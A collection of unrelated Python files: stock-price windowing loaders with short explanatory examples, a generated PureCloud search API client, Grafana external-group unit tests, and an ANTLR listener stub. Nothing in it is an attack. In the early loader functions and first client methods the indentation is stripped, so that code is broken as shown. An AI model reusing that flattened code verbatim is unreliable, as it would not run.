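The windowing in `load_datas` pairs each `n_seq`-row slice with the value on the row immediately after it. The same indexing on a plain list (no pandas, toy numbers) looks like:

```python
prices = [10, 11, 12, 13, 14, 15]
n_seq = 3

# window i covers rows i .. i+n_seq-1; its label is row i+n_seq
windows = [prices[i:i + n_seq] for i in range(len(prices) - n_seq)]
labels = [prices[i + n_seq] for i in range(len(prices) - n_seq)]
```

Each example therefore predicts the next value from the previous `n_seq` values, and the loop stops at `len - n_seq` so every window has a label.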
def load_datas_scaled(df, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_inputs, train_labels = [], []
test_inputs, test_labels = [], []
for i in trange(0, len(df) - n_seq):
x = []
for j in range(n_seq):
xj = df.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y_scaler = scaler_dic[y_col]
y = y_scaler.scale_value(df.iloc[i + n_seq][y_col])
date = df.iloc[i + n_seq]['Date']
if train_start <= date <= train_end:
train_inputs.append(x)
train_labels.append(y)
elif test_start <= date <= test_end:
test_inputs.append(x)
test_labels.append(y)
else:
print(f'discard {date}')
train_inputs = np.array(train_inputs)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_labels = np.array(test_labels)
return train_inputs, train_labels, test_inputs, test_labels, scaler_dic
def _load_datas_by_code_x_multi(df, code, x_cols, y_col, n_seq, scaler_dic):
df_code = df[df['Code'] == code]
data_dic = {}
for i in trange(0, len(df_code) - n_seq):
x = []
for j in range(n_seq):
xj = df_code.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y_scaler = scaler_dic[y_col]
y = y_scaler.scale_value(df_code.iloc[i + n_seq][y_col])
date = df_code.iloc[i + n_seq]['Date']
data_dic[date] = (x, y)
return data_dic
def load_datas_scaled_x_multi(df, code_to_id, y_code, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_inputs, train_codes, train_labels = [], [], []
test_inputs, test_codes, test_labels = [], [], []
data_code_dic = {}
for code in code_to_id.keys():
data_dic = _load_datas_by_code_x_multi(df, code, x_cols, y_col, n_seq, scaler_dic)
data_code_dic[code] = data_dic
date_list = df['Date'].unique()
for i, date in enumerate(tqdm(date_list)):
date = pd.to_datetime(date)
for code in code_to_id.keys():
data_dic = data_code_dic[code]
if date in data_dic:
x, y = data_dic[date]
if train_start <= date <= train_end:
train_inputs.append(x)
train_codes.append([code_to_id[code]] * n_seq)
train_labels.append(y)
elif test_start <= date <= test_end and code == y_code:
test_inputs.append(x)
test_codes.append([code_to_id[code]] * n_seq)
test_labels.append(y)
else:
print(f'discard {date} / {code}')
else:
print(f'not exists {date} / {code}')
train_inputs = np.array(train_inputs)
train_codes = np.array(train_codes)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_codes = np.array(test_codes)
test_labels = np.array(test_labels)
return train_inputs, train_codes, train_labels, test_inputs, test_codes, test_labels, scaler_dic
def _load_datas_by_code_x_y_multi(df, code, x_cols, y_cols, n_seq, scaler_dic):
df_code = df[df['Code'] == code]
data_dic = {}
for i in trange(0, len(df_code) - n_seq):
x = []
for j in range(n_seq):
xj = df_code.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y = []
yj = df_code.iloc[i + n_seq]
for col in y_cols:
y_scaler = scaler_dic[col]
y.append(y_scaler.scale_value(yj[col]))
date = df_code.iloc[i + n_seq]['Date']
data_dic[date] = (x, y)
return data_dic
def load_datas_scaled_x_y_multi(df, code_to_id, y_code, x_cols, y_cols, train_start, train_end, test_start, test_end, n_seq):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_inputs, train_codes, train_labels = [], [], []
test_inputs, test_codes, test_labels = [], [], []
data_code_dic = {}
for code in code_to_id.keys():
data_dic = _load_datas_by_code_x_y_multi(df, code, x_cols, y_cols, n_seq, scaler_dic)
data_code_dic[code] = data_dic
date_list = df['Date'].unique()
for i, date in enumerate(tqdm(date_list)):
date = pd.to_datetime(date)
for code in code_to_id.keys():
data_dic = data_code_dic[code]
if date in data_dic:
x, y = data_dic[date]
if train_start <= date <= train_end:
train_inputs.append(x)
train_codes.append([code_to_id[code]] * n_seq)
train_labels.append(y)
elif test_start <= date <= test_end and code == y_code:
test_inputs.append(x)
test_codes.append([code_to_id[code]] * n_seq)
test_labels.append(y)
else:
print(f'discard {date} / {code}')
else:
print(f'not exists {date} / {code}')
train_inputs = np.array(train_inputs)
train_codes = np.array(train_codes)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_codes = np.array(test_codes)
test_labels = np.array(test_labels)
return train_inputs, train_codes, train_labels, test_inputs, test_codes, test_labels, scaler_dic
def _load_datas_by_code_x_y_step(df, code, x_cols, y_col, n_seq, y_step, scaler_dic):
df_code = df[df['Code'] == code]
data_dic = {}
for i in trange(0, len(df_code) - n_seq - y_step + 1):
x = []
for j in range(n_seq):
xj = df_code.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y = []
for j in range(y_step):
yj = df_code.iloc[i + n_seq + j]
y_scaler = scaler_dic[y_col]
y.append(y_scaler.scale_value(yj[y_col]))
date = df_code.iloc[i + n_seq]['Date']
data_dic[date] = (x, y)
return data_dic
def load_datas_scaled_x_y_step(df, code_to_id, y_code, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq, y_step):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_inputs, train_codes, train_labels = [], [], []
test_inputs, test_codes, test_labels = [], [], []
data_code_dic = {}
for code in code_to_id.keys():
data_dic = _load_datas_by_code_x_y_step(df, code, x_cols, y_col, n_seq, y_step, scaler_dic)
data_code_dic[code] = data_dic
date_list = df['Date'].unique()
for i, date in enumerate(tqdm(date_list)):
date = pd.to_datetime(date)
for code in code_to_id.keys():
data_dic = data_code_dic[code]
if date in data_dic:
x, y = data_dic[date]
if train_start <= date <= train_end:
train_inputs.append(x)
train_codes.append([code_to_id[code]] * n_seq)
train_labels.append(y)
elif test_start <= date <= test_end and code == y_code:
test_inputs.append(x)
test_codes.append([code_to_id[code]] * n_seq)
test_labels.append(y)
else:
print(f'discard {date} / {code}')
else:
print(f'not exists {date} / {code}')
train_inputs = np.array(train_inputs)
train_codes = np.array(train_codes)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_codes = np.array(test_codes)
test_labels = np.array(test_labels)
return train_inputs, train_codes, train_labels, test_inputs, test_codes, test_labels, scaler_dic
def _load_datas_by_code_x_y_s2s(df, code, x_cols, y_col, n_seq, y_step, scaler_dic):
df_code = df[df['Code'] == code]
data_dic = {}
for i in trange(0, len(df_code) - n_seq - y_step + 1):
x = []
for j in range(n_seq):
xj = df_code.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y = []
for j in range(y_step + 1):
yj = df_code.iloc[i + n_seq - 1 + j]
y_scaler = scaler_dic[y_col]
y.append([y_scaler.scale_value(yj[y_col])])
date = df_code.iloc[i + n_seq]['Date']
data_dic[date] = (x, y[:-1], y[1:])
return data_dic
def load_datas_scaled_x_y_s2s(df, code_to_id, y_code, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq, y_step):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_enc_inputs, train_codes, train_dec_inputs, train_labels = [], [], [], []
test_enc_inputs, test_codes, test_dec_inputs, test_labels = [], [], [], []
data_code_dic = {}
for code in code_to_id.keys():
data_dic = _load_datas_by_code_x_y_s2s(df, code, x_cols, y_col, n_seq, y_step, scaler_dic)
data_code_dic[code] = data_dic
date_list = df['Date'].unique()
for i, date in enumerate(tqdm(date_list)):
date = pd.to_datetime(date)
for code in code_to_id.keys():
data_dic = data_code_dic[code]
if date in data_dic:
enc_x, dec_x, y = data_dic[date]
if train_start <= date <= train_end:
train_enc_inputs.append(enc_x)
train_codes.append([code_to_id[code]] * n_seq)
train_dec_inputs.append(dec_x)
train_labels.append(y)
elif test_start <= date <= test_end and code == y_code:
test_enc_inputs.append(enc_x)
test_codes.append([code_to_id[code]] * n_seq)
test_dec_inputs.append(dec_x)
test_labels.append(y)
else:
print(f'discard {date} / {code}')
else:
print(f'not exists {date} / {code}')
train_enc_inputs = np.array(train_enc_inputs)
train_codes = np.array(train_codes)
train_dec_inputs = np.array(train_dec_inputs)
train_labels = np.array(train_labels)
test_enc_inputs = np.array(test_enc_inputs)
test_codes = np.array(test_codes)
test_dec_inputs = np.array(test_dec_inputs)
test_labels = np.array(test_labels)
return train_enc_inputs, train_codes, train_dec_inputs, train_labels, test_enc_inputs, test_codes, test_dec_inputs, test_labels, scaler_dic
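In `_load_datas_by_code_x_y_s2s`, the `y_step + 1` scaled target values are split as `y[:-1]` (decoder inputs) and `y[1:]` (labels) — a one-step teacher-forcing shift for seq2seq training. On a toy sequence:

```python
# y_step + 1 = 4 scaled target values, each wrapped in a list as in the loader
y = [[0.1], [0.2], [0.3], [0.4]]

dec_inputs = y[:-1]  # what the decoder sees at each step
dec_labels = y[1:]   # what it should predict at each step
```

At every decoder step the label is the input shifted one position forward, which is exactly how the `(x, y[:-1], y[1:])` tuples above are consumed.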
# === PureCloudPlatformClientV2/apis/suggest_api.py (MIT) ===
# coding: utf-8
"""
SuggestApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class SuggestApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def get_search(self, q64, **kwargs):
"""
Search using the q64 value returned from a previous search.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_search(q64, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q64: q64 (required)
:param list[str] expand: Which fields, if any, to expand
:param bool profile: profile
:return: JsonNodeSearchResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q64', 'expand', 'profile']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'q64' is set
if ('q64' not in params) or (params['q64'] is None):
raise ValueError("Missing the required parameter `q64` when calling `get_search`")
resource_path = '/api/v2/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'q64' in params:
query_params['q64'] = params['q64']
if 'expand' in params:
query_params['expand'] = params['expand']
if 'profile' in params:
query_params['profile'] = params['profile']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='JsonNodeSearchResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
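Each generated method begins by validating `**kwargs` against an allow-list before touching them. That pattern, isolated from the generated code (the function name here is illustrative):

```python
def check_kwargs(allowed, **kwargs):
    # mirror of the allow-list loop in each generated API method
    for key in kwargs:
        if key not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s'" % key)
    return kwargs

params = check_kwargs(['q64', 'expand', 'profile'], q64='abc', profile=True)

try:
    check_kwargs(['q64'], bogus=1)
    rejected = False
except TypeError:
    rejected = True
```

Unknown keywords fail fast with a `TypeError`, mimicking normal Python call semantics even though the signature only declares `**kwargs`.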
def get_search_suggest(self, q64, **kwargs):
"""
Suggest resources using the q64 value returned from a previous suggest query.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_search_suggest(q64, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q64: q64 (required)
:param list[str] expand: Which fields, if any, to expand
:param bool profile: profile
:return: JsonNodeSearchResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q64', 'expand', 'profile']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_search_suggest" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'q64' is set
if ('q64' not in params) or (params['q64'] is None):
raise ValueError("Missing the required parameter `q64` when calling `get_search_suggest`")
resource_path = '/api/v2/search/suggest'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'q64' in params:
query_params['q64'] = params['q64']
        if 'expand' in params:
            query_params['expand'] = params['expand']
        if 'profile' in params:
            query_params['profile'] = params['profile']

        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(
            resource_path, 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='JsonNodeSearchResponse',
            auth_settings=auth_settings,
            callback=params.get('callback'))
        return response

    def post_search(self, body, **kwargs):
        """
        Search resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.

        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.post_search(body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param SearchRequest body: Search request options (required)
        :param bool profile: profile
        :return: JsonNodeSearchResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body', 'profile']
        all_params.append('callback')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_search" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `post_search`")

        resource_path = '/api/v2/search'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'profile' in params:
            query_params['profile'] = params['profile']

        header_params = {}
        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(
            resource_path, 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='JsonNodeSearchResponse',
            auth_settings=auth_settings,
            callback=params.get('callback'))
        return response

    def post_search_suggest(self, body, **kwargs):
        """
        Suggest resources.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.

        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.post_search_suggest(body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param SuggestSearchRequest body: Search request options (required)
        :param bool profile: profile
        :return: JsonNodeSearchResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body', 'profile']
        all_params.append('callback')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_search_suggest" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `post_search_suggest`")

        resource_path = '/api/v2/search/suggest'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'profile' in params:
            query_params['profile'] = params['profile']

        header_params = {}
        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(
            resource_path, 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='JsonNodeSearchResponse',
            auth_settings=auth_settings,
            callback=params.get('callback'))
        return response
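# The three search methods above share one calling convention: with no
# `callback` keyword the call blocks and returns the response; with a
# `callback` it returns a thread that invokes the callback when the response
# arrives. A minimal, self-contained sketch of that dispatch pattern follows
# (the `call_api`/`make_request` names here are illustrative stand-ins, not
# the real PureCloud client internals):

```python
import threading


def call_api(make_request, callback=None):
    # Synchronous path: run the request and hand back the response directly.
    if callback is None:
        return make_request()

    # Asynchronous path: run the request in a thread, deliver via callback.
    def worker():
        callback(make_request())

    thread = threading.Thread(target=worker)
    thread.start()
    return thread


results = []
t = call_api(lambda: {"total": 1}, callback=results.append)
t.join()
print(results)  # [{'total': 1}]

sync = call_api(lambda: {"total": 2})
print(sync)  # {'total': 2}
```

# Callers using the asynchronous form must keep a reference to the returned
# thread (or join it) if they need the callback to have fired before exiting.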
# ---- File: tests/unittests/test_external_group.py (ZPascal/grafana_api_sdk, Apache-2.0) ----
from unittest import TestCase
from unittest.mock import MagicMock, Mock, patch

from src.grafana_api.model import APIModel
from src.grafana_api.external_group import ExternalGroup


class ExternalGroupTestCase(TestCase):
    @patch("src.grafana_api.api.Api.call_the_api")
    def test_get_external_groups(self, call_the_api_mock):
        model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
        external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)

        mock: Mock = Mock()
        mock.json = Mock(return_value=list([{"orgId": "test"}]))
        call_the_api_mock.return_value = mock

        self.assertEqual(
            list([{"orgId": "test"}]),
            external_group.get_external_groups(1),
        )

    @patch("src.grafana_api.api.Api.call_the_api")
    def test_get_external_groups_no_team_id(self, call_the_api_mock):
        model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
        external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)

        mock: Mock = Mock()
        mock.json = Mock(return_value=list())
        call_the_api_mock.return_value = mock

        with self.assertRaises(ValueError):
            external_group.get_external_groups(0)

    @patch("src.grafana_api.api.Api.call_the_api")
    def test_get_external_groups_no_valid_result(self, call_the_api_mock):
        model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
        external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)

        mock: Mock = Mock()
        mock.json = Mock(return_value=list())
        call_the_api_mock.return_value = mock

        with self.assertRaises(Exception):
            external_group.get_external_groups(1)

    @patch("src.grafana_api.api.Api.call_the_api")
    def test_add_external_group(self, call_the_api_mock):
        model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
        external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)

        mock: Mock = Mock()
        mock.json = Mock(return_value=dict({"message": "Group added to Team"}))
        call_the_api_mock.return_value = mock

        self.assertEqual(
            None,
            external_group.add_external_group(
                1, "cn=editors,ou=groups,dc=grafana,dc=org"
            ),
        )

    @patch("src.grafana_api.api.Api.call_the_api")
    def test_add_external_group_no_team_id(self, call_the_api_mock):
        model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
        external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)

        mock: Mock = Mock()
        mock.json = Mock(return_value=dict())
        call_the_api_mock.return_value = mock

        with self.assertRaises(ValueError):
            external_group.add_external_group(0, "")

    @patch("src.grafana_api.api.Api.call_the_api")
    def test_add_external_group_no_valid_result(self, call_the_api_mock):
        model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
        external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)

        mock: Mock = Mock()
        mock.json = Mock(return_value=dict())
        call_the_api_mock.return_value = mock

        with self.assertRaises(Exception):
            external_group.add_external_group(
                1, "cn=editors,ou=groups,dc=grafana,dc=org"
            )

    @patch("src.grafana_api.api.Api.call_the_api")
    def test_remove_external_group(self, call_the_api_mock):
        model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
        external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)

        mock: Mock = Mock()
        mock.json = Mock(return_value=dict({"message": "Team Group removed"}))
        call_the_api_mock.return_value = mock

        self.assertEqual(
            None,
            external_group.remove_external_group(
                1, "cn=editors,ou=groups,dc=grafana,dc=org"
            ),
        )

    @patch("src.grafana_api.api.Api.call_the_api")
    def test_remove_external_group_no_team_id(self, call_the_api_mock):
        model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
        external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)

        mock: Mock = Mock()
        mock.json = Mock(return_value=dict())
        call_the_api_mock.return_value = mock

        with self.assertRaises(ValueError):
            external_group.remove_external_group(0, "")

    @patch("src.grafana_api.api.Api.call_the_api")
    def test_remove_external_group_no_valid_result(self, call_the_api_mock):
        model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
        external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)

        mock: Mock = Mock()
        mock.json = Mock(return_value=dict())
        call_the_api_mock.return_value = mock

        with self.assertRaises(Exception):
            external_group.remove_external_group(
                1, "cn=editors,ou=groups,dc=grafana,dc=org"
            )
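# Every test above stubs the HTTP layer the same way: a `Mock` whose `json()`
# returns the canned payload. The pattern in isolation, without the Grafana
# client (the `fetch_org` function below is a hypothetical stand-in for the
# code under test):

```python
from unittest.mock import Mock


def fetch_org(client):
    # Code under test: make an API call and decode the JSON body.
    return client.call_the_api().json()


client = Mock()
# Chain return_value so that client.call_the_api() yields an object whose
# .json() returns the canned dict.
client.call_the_api.return_value.json = Mock(return_value={"orgId": "test"})

print(fetch_org(client))  # {'orgId': 'test'}
```

# Attribute access on a `Mock` auto-creates child mocks, which is why the
# `return_value.json` chain works without declaring anything up front.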
# ---- File: sploy/ploy/tasks.py (estackhub/sploy, MIT) ----
from sploy.sploy.api.allot import validate_files_space_limit, validate_db_space_limit
def daily():
    validate_files_space_limit()
    validate_db_space_limit()
# ---- File: platform/hwconf_data/ezr32wg/modules/WDOG/__init__.py (lenloe1/v2.7, Zlib) ----
import ezr32wg.halconfig.halconfig_types as halconfig_types
import ezr32wg.halconfig.halconfig_dependency as halconfig_dependency
import ezr32wg.PythonSnippet.ExporterModel as ExporterModel
import ezr32wg.PythonSnippet.RuntimeModel as RuntimeModel
import ezr32wg.PythonSnippet.Metadata as Metadata
# ---- File: sportsdataverse/nfl/__init__.py (saiemgilani/sportsdataverse-py, MIT) ----
from sportsdataverse.nfl.nfl_loaders import *
from sportsdataverse.nfl.nfl_pbp import *
from sportsdataverse.nfl.nfl_schedule import *
from sportsdataverse.nfl.nfl_teams import *
# ---- File: src/scheduled-query/azext_scheduled_query/grammar/scheduled_query/ScheduleQueryConditionListener.py (YingXue/azure-cli-extensions, MIT) ----
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=all
# Generated from ScheduleQueryCondition.g4 by ANTLR 4.7.2
from antlr4 import *
# This class defines a complete listener for a parse tree produced by ScheduleQueryConditionParser.
class ScheduleQueryConditionListener(ParseTreeListener):

    # Enter a parse tree produced by ScheduleQueryConditionParser#expression.
    def enterExpression(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#expression.
    def exitExpression(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#aggregation.
    def enterAggregation(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#aggregation.
    def exitAggregation(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#comes_from.
    def enterComes_from(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#comes_from.
    def exitComes_from(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#namespace.
    def enterNamespace(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#namespace.
    def exitNamespace(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#metric_with_quote.
    def enterMetric_with_quote(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#metric_with_quote.
    def exitMetric_with_quote(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#metric.
    def enterMetric(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#metric.
    def exitMetric(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#query_with_quote.
    def enterQuery_with_quote(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#query_with_quote.
    def exitQuery_with_quote(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#query.
    def enterQuery(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#query.
    def exitQuery(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#operator.
    def enterOperator(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#operator.
    def exitOperator(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#threshold.
    def enterThreshold(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#threshold.
    def exitThreshold(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#resource_column.
    def enterResource_column(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#resource_column.
    def exitResource_column(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#resource_id.
    def enterResource_id(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#resource_id.
    def exitResource_id(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#resource.
    def enterResource(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#resource.
    def exitResource(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#column.
    def enterColumn(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#column.
    def exitColumn(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#falling_period.
    def enterFalling_period(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#falling_period.
    def exitFalling_period(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#at.
    def enterAt(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#at.
    def exitAt(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#least.
    def enterLeast(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#least.
    def exitLeast(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#violations.
    def enterViolations(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#violations.
    def exitViolations(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#out.
    def enterOut(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#out.
    def exitOut(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#of.
    def enterOf(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#of.
    def exitOf(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#min_times.
    def enterMin_times(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#min_times.
    def exitMin_times(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#aggregated.
    def enterAggregated(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#aggregated.
    def exitAggregated(self, ctx):
        pass

    # Enter a parse tree produced by ScheduleQueryConditionParser#points.
    def enterPoints(self, ctx):
        pass

    # Exit a parse tree produced by ScheduleQueryConditionParser#points.
    def exitPoints(self, ctx):
        pass

